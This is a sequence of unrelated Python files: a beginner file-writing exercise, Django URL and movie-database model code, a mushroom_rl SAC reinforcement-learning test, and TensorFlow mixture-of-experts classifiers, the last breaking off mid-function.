print("if you do want that, hit RETURN.")
# get input from the user on whether or not they want to erase the contents of filename
input("?")
# print a string
print("Opening the file...")
# open the file referenced by filename in write mode (which truncates the file) and store the returned file object in target
target = open(filename, 'w')
# print a string
print("Truncating the file. Goodbye!")
# truncate the file object stored in target
target.truncate()
# print a string
print("Now I'm going to ask you for three lines.")
# get user input for line 1 and store in line1
line1 = input("line 1: ")
# get user input for line 2 and store in line2
line2 = input("line 2: ")
# get user input for line 3 and store in line3
line3 = input("line 3: ")
# print a string
print("I'm going to write these to the file.")
# write string stored in line1 to file object in target
target.write(line1)
# write a newline character to file object in target
target.write("\n")
# write string stored in line2 to file object in target
target.write(line2)
# write a newline character to file object in target
target.write("\n")
# write string stored in line3 to file object in target
target.write(line3)
# write a newline character to file object in target
target.write("\n")
# print a string
print("And finally we close it.")
# close the file object in target.
target.close()
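# Note: the explicit open()/close() pair above can be written more robustly
# with a context manager, which closes the file even if a write fails (sketch):
#
#     with open(filename, 'w') as target:
#         target.write('\n'.join([line1, line2, line3]) + '\n')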
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
from django.conf.urls import include, url
from django.contrib import admin
from s_analyzer.apps.rest.api import router
from s_analyzer.site.views import HomeView
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^$', HomeView.as_view(), name="home"),
]
|
nilq/baby-python
|
python
|
from django.db import models
from re import sub
# Create your models here.
class Movie(models.Model):
movie_name = models.CharField(max_length=250, unique=True, blank=False, null=False)
movie_year = models.IntegerField()
imdb_rating = models.DecimalField(max_digits=3, decimal_places=2, blank=True, null=True)
imdb_link = models.URLField(blank=True, null=True)
down720_link = models.URLField(blank=True, null=True)
down1080_link = models.URLField(blank=True, null=True)
image_available = models.BooleanField(default=False)
created_on = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '{} {}'.format(self.movie_name, self.movie_year)
def human_readable_name(self):
return sub('[/ ]+', '_', self.movie_name)
class Actor(models.Model):
actor_name = models.CharField(max_length=100, blank=False, null=False)
movies = models.ManyToManyField(Movie)
def __str__(self):
return self.actor_name
class Director(models.Model):
director_name = models.CharField(max_length=100, blank=False, null=False)
movies = models.ManyToManyField(Movie)
def __str__(self):
return self.director_name
class Genre(models.Model):
genre = models.CharField(max_length=100, blank=False, null=False)
movies = models.ManyToManyField(Movie)
def __str__(self):
return self.genre
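# Usage sketch (assumes migrations have been applied; names are illustrative):
#
#     movie = Movie.objects.create(movie_name="Some/Film Name", movie_year=2020)
#     actor = Actor.objects.create(actor_name="Jane Doe")
#     actor.movies.add(movie)
#     movie.human_readable_name()  # -> "Some_Film_Name"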
|
nilq/baby-python
|
python
|
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from datetime import datetime
from helper.utils import TestUtils as tu
from mushroom_rl.core import Agent
from mushroom_rl.algorithms.actor_critic import SAC
from mushroom_rl.core import Core
from mushroom_rl.environments.gym_env import Gym
class CriticNetwork(nn.Module):
def __init__(self, input_shape, output_shape, **kwargs):
super().__init__()
n_input = input_shape[-1]
n_output = output_shape[0]
self._h = nn.Linear(n_input, n_output)
nn.init.xavier_uniform_(self._h.weight,
gain=nn.init.calculate_gain('relu'))
def forward(self, state, action):
state_action = torch.cat((state.float(), action.float()), dim=1)
q = F.relu(self._h(state_action))
return torch.squeeze(q)
class ActorNetwork(nn.Module):
def __init__(self, input_shape, output_shape, **kwargs):
super(ActorNetwork, self).__init__()
n_input = input_shape[-1]
n_output = output_shape[0]
self._h = nn.Linear(n_input, n_output)
nn.init.xavier_uniform_(self._h.weight,
gain=nn.init.calculate_gain('relu'))
def forward(self, state):
return F.relu(self._h(torch.squeeze(state, 1).float()))
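# Quick shape sanity check for the two networks above (Pendulum-v0 has a
# 3-dimensional observation and a 1-dimensional action, so the critic input
# shape is (4,) after state-action concatenation):
#
#     critic = CriticNetwork((4,), (1,))
#     actor = ActorNetwork((3,), (1,))
#     q = critic(torch.zeros(8, 3), torch.zeros(8, 1))  # -> shape (8,)
#     a = actor(torch.zeros(8, 3))                      # -> shape (8, 1)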
def learn_sac():
# MDP
horizon = 200
gamma = 0.99
mdp = Gym('Pendulum-v0', horizon, gamma)
mdp.seed(1)
np.random.seed(1)
torch.manual_seed(1)
torch.cuda.manual_seed(1)
# Settings
initial_replay_size = 64
max_replay_size = 50000
batch_size = 64
n_features = 64
warmup_transitions = 10
tau = 0.005
lr_alpha = 3e-4
# Approximator
actor_input_shape = mdp.info.observation_space.shape
actor_mu_params = dict(network=ActorNetwork,
n_features=n_features,
input_shape=actor_input_shape,
output_shape=mdp.info.action_space.shape,
use_cuda=False)
actor_sigma_params = dict(network=ActorNetwork,
n_features=n_features,
input_shape=actor_input_shape,
output_shape=mdp.info.action_space.shape,
use_cuda=False)
actor_optimizer = {'class': optim.Adam,
'params': {'lr': 3e-4}}
critic_input_shape = (
actor_input_shape[0] + mdp.info.action_space.shape[0],)
critic_params = dict(network=CriticNetwork,
optimizer={'class': optim.Adam,
'params': {'lr': 3e-4}},
loss=F.mse_loss,
n_features=n_features,
input_shape=critic_input_shape,
output_shape=(1,),
use_cuda=False)
# Agent
agent = SAC(mdp.info, actor_mu_params, actor_sigma_params, actor_optimizer,
critic_params, batch_size, initial_replay_size, max_replay_size,
warmup_transitions, tau, lr_alpha,
critic_fit_params=None)
# Algorithm
core = Core(agent, mdp)
core.learn(n_steps=2 * initial_replay_size,
n_steps_per_fit=initial_replay_size)
return agent
def test_sac():
policy = learn_sac().policy
w = policy.get_weights()
w_test = np.array([ 1.6998193, -0.732528, 1.2986078, -0.26860124,
0.5094043, -0.5001421, -0.18989229, -0.30646914])
assert np.allclose(w, w_test)
def test_sac_save(tmpdir):
agent_path = tmpdir / 'agent_{}'.format(datetime.now().strftime("%H%M%S%f"))
agent_save = learn_sac()
agent_save.save(agent_path, full_save=True)
agent_load = Agent.load(agent_path)
    for att in vars(agent_save):
save_attr = getattr(agent_save, att)
load_attr = getattr(agent_load, att)
tu.assert_eq(save_attr, load_attr)
|
nilq/baby-python
|
python
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains model definitions."""
import math
import models
import tensorflow as tf
import numpy as np
import utils
from tensorflow import flags
import tensorflow.contrib.slim as slim
FLAGS = flags.FLAGS
flags.DEFINE_integer(
"moe_num_mixtures", 8,
"The number of mixtures (excluding the dummy 'expert') used for MoeModel.")
flags.DEFINE_integer(
"moe_num_extend", 8,
"The number of attention outputs, used for MoeExtendModel.")
flags.DEFINE_string("moe_method", "none",
"The pooling method used in the DBoF cluster layer. "
"used for MoeMaxModel.")
flags.DEFINE_integer(
"class_size", 200,
"The dimention of prediction projection, used for all chain models.")
flags.DEFINE_integer(
"encoder_size", 100,
"The dimention of prediction encoder, used for all mix models.")
flags.DEFINE_integer(
"hidden_size_1", 100,
"The size of the first hidden layer, used forAutoEncoderModel.")
flags.DEFINE_integer(
"hidden_channels", 3,
"The number of hidden layers, only used in early experiment.")
flags.DEFINE_integer(
"moe_layers", 1,
"The number of combine layers, used for combine related models.")
flags.DEFINE_integer(
"softmax_bound", 1000,
"The number of labels to be a group, only used for MoeSoftmaxModel and MoeDistillSplitModel.")
flags.DEFINE_bool(
"moe_group", False,
"Whether to split the 4716 labels into different groups, used in MoeMix4Model and MoeNoiseModel")
flags.DEFINE_float("noise_std", 0.2, "the standard deviation of noise added to the input.")
flags.DEFINE_float("ensemble_w", 1.0, "ensemble weight used in distill chain models.")
class LogisticModel(models.BaseModel):
"""Logistic model with L2 regularization."""
def create_model(self, model_input, vocab_size, l2_penalty=1e-8, **unused_params):
"""Creates a logistic model.
Args:
model_input: 'batch' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes."""
output = slim.fully_connected(
model_input, vocab_size, activation_fn=tf.nn.sigmoid,
weights_regularizer=slim.l2_regularizer(l2_penalty))
return {"predictions": output}
class MoeModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
shape = model_input.get_shape().as_list()
if FLAGS.frame_features:
model_input = tf.reshape(model_input,[-1,shape[-1]])
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
"""
gate_w = tf.get_variable("gate_w", [shape[1], vocab_size * (num_mixtures + 1)], tf.float32,
initializer=tf.contrib.layers.xavier_initializer())
tf.add_to_collection(name=tf.GraphKeys.REGULARIZATION_LOSSES, value=l2_penalty*tf.nn.l2_loss(gate_w))
gate_activations = tf.matmul(model_input,gate_w)
expert_w = tf.get_variable("expert_w", [shape[1], vocab_size * num_mixtures], tf.float32,
initializer=tf.contrib.layers.xavier_initializer())
tf.add_to_collection(name=tf.GraphKeys.REGULARIZATION_LOSSES, value=l2_penalty*tf.nn.l2_loss(expert_w))
expert_v = tf.get_variable("expert_v", [vocab_size * num_mixtures], tf.float32,
initializer=tf.constant_initializer(0.0))
tf.add_to_collection(name=tf.GraphKeys.REGULARIZATION_LOSSES, value=l2_penalty*tf.nn.l2_loss(expert_v))
expert_activations = tf.nn.xw_plus_b(model_input,expert_w,expert_v)"""
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
return {"predictions": final_probabilities}
class MoeDistillModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
shape = model_input.get_shape().as_list()
if FLAGS.frame_features:
model_input = tf.reshape(model_input,[-1,shape[-1]])
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_sub_probabilities = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
if distill_labels is not None:
expert_gate = slim.fully_connected(
model_input,
vocab_size,
activation_fn=tf.nn.sigmoid,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="expert_gate")
expert_gate = expert_gate*0.8 + 0.1
final_probabilities = distill_labels*(1.0-expert_gate) + final_sub_probabilities*expert_gate
tf.summary.histogram("expert_gate/activations", expert_gate)
else:
final_probabilities = final_sub_probabilities
return {"predictions": final_probabilities, "predictions_class": final_sub_probabilities}
class MoeDistillEmbeddingModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
"""
embedding_mat = np.loadtxt("./resources/embedding_matrix.model.gz")
embedding_mat = tf.cast(embedding_mat,dtype=tf.float32)
bound = FLAGS.softmax_bound
vocab_size_1 = bound
probabilities_by_distill = distill_labels[:, :vocab_size_1]
embedding_mat = embedding_mat[:vocab_size_1, :]
labels_smooth = tf.matmul(probabilities_by_distill, embedding_mat)
probabilities_by_smooth_1 = (labels_smooth[:, :vocab_size_1] - probabilities_by_distill)/tf.reduce_sum(probabilities_by_distill,axis=1,keep_dims=True)
probabilities_by_smooth_2 = labels_smooth[:, vocab_size_1:]/tf.reduce_sum(probabilities_by_distill,axis=1,keep_dims=True)
labels_smooth = tf.concat((probabilities_by_smooth_1, probabilities_by_smooth_2), axis=1)"""
expert_gate = slim.fully_connected(
distill_labels,
1,
activation_fn=tf.nn.sigmoid,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="expert_gate")
#final_probabilities = tf.clip_by_value(distill_labels + labels_smooth, 0.0, 1.0)
final_probabilities = distill_labels
return {"predictions": final_probabilities}
class MoeDistillChainModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = 256
shape = model_input.get_shape().as_list()
if distill_labels is not None:
class_input = slim.fully_connected(
distill_labels,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities}
class MoeDistillChainNormModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = 256
model_input = tf.nn.l2_normalize(model_input,dim=1)
if distill_labels is not None:
class_input = slim.fully_connected(
distill_labels,
class_size,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_input = class_input/tf.reduce_sum(distill_labels,axis=1,keep_dims=True)
class_input = tf.nn.l2_normalize(class_input,dim=1)
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities}
class MoeDistillChainNorm2Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = 256
model_input = tf.nn.l2_normalize(model_input,dim=1)
if distill_labels is not None:
class_input = slim.fully_connected(
distill_labels,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_input = class_input/tf.reduce_sum(distill_labels,axis=1,keep_dims=True)
class_input = tf.nn.l2_normalize(class_input,dim=1)
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities}
class MoeDistillSplitModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
bound = FLAGS.softmax_bound
vocab_size_1 = bound
class_size = 256
probabilities_by_distill = distill_labels[:,vocab_size_1:]
class_input = slim.fully_connected(
probabilities_by_distill,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
#class_input = tf.nn.l2_normalize(class_input, dim=1)
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size_1 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size_1 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size_1])
final_probabilities = tf.concat((probabilities_by_class_and_batch, probabilities_by_distill), axis=1)
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities}
class MoeDistillSplit2Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
bound = FLAGS.softmax_bound
vocab_size_1 = bound
class_size = 256
probabilities_by_distill = distill_labels[:,vocab_size_1:]
probabilities_by_residual = tf.clip_by_value(1.0-tf.reduce_sum(probabilities_by_distill,axis=1,keep_dims=True), 0.0, 1.0)
probabilities_by_distill_residual = tf.concat((probabilities_by_residual,probabilities_by_distill), axis=1)
class_input = slim.fully_connected(
probabilities_by_distill_residual,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_input = tf.nn.l2_normalize(class_input, dim=1)
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size_1 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size_1 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size_1])
final_probabilities = tf.concat((probabilities_by_class_and_batch, probabilities_by_distill), axis=1)
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities}
class MoeDistillSplit3Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
bound = FLAGS.softmax_bound
vocab_size_1 = bound
vocab_size_2 = vocab_size - vocab_size_1
class_size = 256
probabilities_by_distill = distill_labels[:,:vocab_size_1]
probabilities_by_residual = distill_labels[:,vocab_size_1:]
feature_size = model_input.get_shape().as_list()[1]
model_input = slim.fully_connected(
model_input,
feature_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="model_inputs")
model_input = tf.nn.l2_normalize(model_input, dim=1)
gate_activations_1 = slim.fully_connected(
model_input,
vocab_size_1 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-1")
expert_activations_1 = slim.fully_connected(
model_input,
vocab_size_1 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-1")
gating_distribution_1 = tf.nn.softmax(tf.reshape(
gate_activations_1,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution_1 = tf.nn.sigmoid(tf.reshape(
expert_activations_1,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch_1 = tf.reduce_sum(
gating_distribution_1[:, :num_mixtures] * expert_distribution_1, 1)
probabilities_by_class_and_batch_1 = tf.reshape(probabilities_by_class_and_batch_1,
[-1, vocab_size_1])
probabilities_by_class = tf.concat((probabilities_by_class_and_batch_1, probabilities_by_residual), axis=1)
class_input = slim.fully_connected(
probabilities_by_distill,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_input = tf.nn.l2_normalize(class_input, dim=1)
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size_2 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size_2 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
